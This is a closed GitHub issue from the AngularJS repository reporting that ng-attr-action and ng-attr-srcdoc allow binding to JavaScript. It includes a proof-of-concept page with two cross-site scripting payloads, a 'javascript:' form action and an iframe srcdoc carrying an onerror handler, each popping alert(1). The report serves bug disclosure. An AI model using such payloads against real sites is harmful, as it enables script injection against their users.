This repository was archived by the owner on Apr 12, 2024. It is now read-only.
This repository was archived by the owner on Apr 12, 2024. It is now read-only.
ng-attr-action and ng-attr-srcdoc allow binding to Javascript #4927
Closed
Description
Ref: https://code.google.com/p/mustache-security/wiki/AngularJS#The_State_of_AngularJS_1.2.0
<html ng-app>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0-rc.2/angular.min.js"></script>
</head>
<body>
<form ng-attr-action="{{'javascript:'}}alert(1)"><button>CLICK</button></form>
<iframe ng-attr-srcdoc="{{'<img src=x onerror=alert(1)>'}}"></a>
</body>Metadata
Metadata
Assignees
Labels
No labels